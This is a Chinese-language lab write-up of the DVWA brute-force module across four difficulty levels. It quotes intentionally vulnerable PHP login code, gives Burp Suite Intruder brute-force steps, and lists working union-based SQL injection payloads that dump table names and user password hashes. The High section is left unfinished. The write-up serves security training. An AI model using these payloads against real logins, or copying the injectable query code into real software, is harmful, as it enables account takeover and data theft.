结合DVWA-Brute Force(暴力破解)_登录密码brute force
赞
踩
Brute Force(暴力破解):指的是黑客利用密码字典,使用穷举法猜解出用户的口令。
一、Low:
看下核心源码:这里对username、password都未进行过滤,isset()函数只是检查参数是否被设置,返回True或者False。且后面将username、password这两个参数带入数据库查询,故存在SQL注入的漏洞。故有两种方法:(1)抓包用burp suite爆破;(2)手工SQL注入。
1.用burp suite爆破
- <?php
-
- if( isset( $_GET[ 'Login' ] ) ) {
- // Get username
- $user = $_GET[ 'username' ];
-
- // Get password
- $pass = $_GET[ 'password' ];
- $pass = md5( $pass );
-
- // Check the database
- $query = "SELECT * FROM `users` WHERE user = '$user' AND password = '$pass';";
- $result = mysqli_query($GLOBALS["___mysqli_ston"], $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );
-
- if( $result && mysqli_num_rows( $result ) == 1 ) {
- // Get users details
- $row = mysqli_fetch_assoc( $result );
- $avatar = $row["avatar"];
-
- // Login successful
- $html .= "<p>Welcome to the password protected area {$user}</p>";
- $html .= "<img src=\"{$avatar}\" />";
- }
- else {
- // Login failed
- $html .= "<pre><br />Username and/or password incorrect.</pre>";
- }
-
- ((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res);
- }
-
- ?>
随便输入一个密码111抓个数据包,右键发送到Intruder模块:
选择Attack type为:Cluster bomb。这里要破解username、password,故点击clear§,清除包里变量两边的§,然后在username、password等号后的内容两侧加上§,表示要破解这个参数。
点击Payload,设置Paylosd set为1,type为Simple list,点击load添加字典username.txt文件。设置Payload set为2,type为Simple list,点击load添加字典Password.txt文件。(为节省执行时间,我选了几个密码和用户名,实际上应该用大字典)
点击Start attack开始攻击。一般长度不一致的就是密码。这里是password。再看下返回的数据包,故password是正确密码。正确的用户名和密码会数据包会返回:Welcome to the password protected area admin。如下图:
错误的用户名或者密码返回的数据包会提示:Username and/or password incorrect。如下图:
2.手工SQL注入。
代码中未过滤username和password参数,在username出注入。在登录框输入:1,查询成功。输入1' and '1' ='1或者1' and 1=1#,成功。输入1' and '1' ='2或者1' and 1=2#,返回为空。故为单引号字符型注入。
猜解字段数:1' order by 1# 和 1' order by 2# 均成功查询,但是 1' order by 3# 失败,或者用 -1' union select 1,2# 查询成功,用-1' union select 1,2,3# ,查询失败。故字段数为2。
返回1和2,说明1处字段为Firstname,2处为Surname。且1和2处均可注入。获取当前数据库和版本号:-1' union select database(),version()# ,当前数据为:dvwa ,版本为:5.7.26。
获取数据库中的表:-1' union select 1,group_concat(table_name) from information_schema.tables where table_schema=database() # 表为guestbook、users。
获取表中的字段名:-1' union select 1,group_concat(column_name) from information_schema.columns where table_name='users' #
字段有:user_id、first_name、last_name、user、password、avatar、last_login、failed_login、USER、CURRENT_CONNECTIONS、TOTAL_CONNECTIONS、id、username、password、level、id、username、password。
获取用户数据:-1' union select group_concat(user_id,first_name,last_name),group_concat(last_login,password) from users #
二、medium
看下代码:mysqli_real_escape_string()函数对字符串中的特殊符号(x00 / n / r / ' / " / xla)进行转义,抵抗SQL注入攻击。但是如果MYSQL5.5.37以下版本,若设置编码为GBK,能绕过该函数对单引号的转义;$pass做了MD5校验,但未防止做暴力破解机制。虽然sleep()函数,登录失败一次会有2秒延迟,但并不能阻止暴力破解攻击。故用burp suite暴力破解(和low级别流程类似,由于sleep()函数,会比较慢)。
- <?php
-
- if( isset( $_GET[ 'Login' ] ) ) {
- // Sanitise username input
- $user = $_GET[ 'username' ];
- $user = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $user ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
-
- // Sanitise password input
- $pass = $_GET[ 'password' ];
- $pass = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $pass ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
- $pass = md5( $pass );
-
- // Check the database
- $query = "SELECT * FROM `users` WHERE user = '$user' AND password = '$pass';";
- $result = mysqli_query($GLOBALS["___mysqli_ston"], $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );
-
- if( $result && mysqli_num_rows( $result ) == 1 ) {
- // Get users details
- $row = mysqli_fetch_assoc( $result );
- $avatar = $row["avatar"];
-
- // Login successful
- $html .= "<p>Welcome to the password protected area {$user}</p>";
- $html .= "<img src=\"{$avatar}\" />";
- }
- else {
- // Login failed
- sleep( 2 );
- $html .= "<pre><br />Username and/or password incorrect.</pre>";
- }
-
- ((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res);
- }
-
- ?>
三、high
看下核心源码:stripslashes()函数去除字符串中的反斜线(多个只去除一个),mysqli_real_escape_string()函数对字符串中的特殊符号(x00 / n / r / ' / " / xla)进行转义,抵抗SQL注入攻击。这里加入token,用来抵抗CSRF攻击。每次服务器返回登录页面,浏览器会发送给用户一个新的token值,用户发送登录请求时,需要同时上传token值。所以burp suite直接爆破不行了。
- <?php
-
- if( isset( $_GET[ 'Login' ] ) ) {
- // Check Anti-CSRF token
- checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );
-
- // Sanitise username input
- $user = $_GET[ 'username' ];
- $user = stripslashes( $user );
- $user = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $user ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
-
- // Sanitise password input
- $pass = $_GET[ 'password' ];
- $pass = stripslashes( $pass );
- $pass = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $pass ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
- $pass = md5( $pass );
-
- // Check database
- $query = "SELECT * FROM `users` WHERE user = '$user' AND password = '$pass';";
- $result = mysqli_query($GLOBALS["___mysqli_ston"], $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );
-
- if( $result && mysqli_num_rows( $result ) == 1 ) {
- // Get users details
- $row = mysqli_fetch_assoc( $result );
- $avatar = $row["avatar"];
-
- // Login successful
- $html .= "<p>Welcome to the password protected area {$user}</p>";
- $html .= "<img src=\"{$avatar}\" />";
- }
- else {
- // Login failed
- sleep( rand( 0, 3 ) );
- $html .= "<pre><br />Username and/or password incorrect.</pre>";
- }
-
- ((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res);
- }
-
- // Generate Anti-CSRF token
- generateSessionToken();
-
- ?>
待补充
四、impossible
看下核心源码:当用户输入错的登录信息3次,锁定15秒,当用户多次登录失败,锁定该账户,故防止了暴力破解。
- <?php
-
- if( isset( $_POST[ 'Login' ] ) && isset ($_POST['username']) && isset ($_POST['password']) ) {
- // Check Anti-CSRF token
- checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );
-
- // Sanitise username input
- $user = $_POST[ 'username' ];
- $user = stripslashes( $user );
- $user = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $user ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
-
- // Sanitise password input
- $pass = $_POST[ 'password' ];
- $pass = stripslashes( $pass );
- $pass = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $pass ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
- $pass = md5( $pass );
-
- // Default values
- $total_failed_login = 3;
- $lockout_time = 15;
- $account_locked = false;
-
- // Check the database (Check user information)
- $data = $db->prepare( 'SELECT failed_login, last_login FROM users WHERE user = (:user) LIMIT 1;' );
- $data->bindParam( ':user', $user, PDO::PARAM_STR );
- $data->execute();
- $row = $data->fetch();
-
- // Check to see if the user has been locked out.
- if( ( $data->rowCount() == 1 ) && ( $row[ 'failed_login' ] >= $total_failed_login ) ) {
- // User locked out. Note, using this method would allow for user enumeration!
- //$html .= "<pre><br />This account has been locked due to too many incorrect logins.</pre>";
-
- // Calculate when the user would be allowed to login again
- $last_login = strtotime( $row[ 'last_login' ] );
- $timeout = $last_login + ($lockout_time * 60);
- $timenow = time();
-
- /*
- print "The last login was: " . date ("h:i:s", $last_login) . "<br />";
- print "The timenow is: " . date ("h:i:s", $timenow) . "<br />";
- print "The timeout is: " . date ("h:i:s", $timeout) . "<br />";
- */
-
- // Check to see if enough time has passed, if it hasn't locked the account
- if( $timenow < $timeout ) {
- $account_locked = true;
- // print "The account is locked<br />";
- }
- }
-
- // Check the database (if username matches the password)
- $data = $db->prepare( 'SELECT * FROM users WHERE user = (:user) AND password = (:password) LIMIT 1;' );
- $data->bindParam( ':user', $user, PDO::PARAM_STR);
- $data->bindParam( ':password', $pass, PDO::PARAM_STR );
- $data->execute();
- $row = $data->fetch();
-
- // If its a valid login...
- if( ( $data->rowCount() == 1 ) && ( $account_locked == false ) ) {
- // Get users details
- $avatar = $row[ 'avatar' ];
- $failed_login = $row[ 'failed_login' ];
- $last_login = $row[ 'last_login' ];
-
- // Login successful
- $html .= "<p>Welcome to the password protected area <em>{$user}</em></p>";
- $html .= "<img src=\"{$avatar}\" />";
-
- // Had the account been locked out since last login?
- if( $failed_login >= $total_failed_login ) {
- $html .= "<p><em>Warning</em>: Someone might of been brute forcing your account.</p>";
- $html .= "<p>Number of login attempts: <em>{$failed_login}</em>.<br />Last login attempt was at: <em>${last_login}</em>.</p>";
- }
-
- // Reset bad login count
- $data = $db->prepare( 'UPDATE users SET failed_login = "0" WHERE user = (:user) LIMIT 1;' );
- $data->bindParam( ':user', $user, PDO::PARAM_STR );
- $data->execute();
- } else {
- // Login failed
- sleep( rand( 2, 4 ) );
-
- // Give the user some feedback
- $html .= "<pre><br />Username and/or password incorrect.<br /><br/>Alternative, the account has been locked because of too many failed logins.<br />If this is the case, <em>please try again in {$lockout_time} minutes</em>.</pre>";
-
- // Update bad login count
- $data = $db->prepare( 'UPDATE users SET failed_login = (failed_login + 1) WHERE user = (:user) LIMIT 1;' );
- $data->bindParam( ':user', $user, PDO::PARAM_STR );
- $data->execute();
- }
-
- // Set the last login time
- $data = $db->prepare( 'UPDATE users SET last_login = now() WHERE user = (:user) LIMIT 1;' );
- $data->bindParam( ':user', $user, PDO::PARAM_STR );
- $data->execute();
- }
-
- // Generate Anti-CSRF token
- generateSessionToken();
-
- ?>
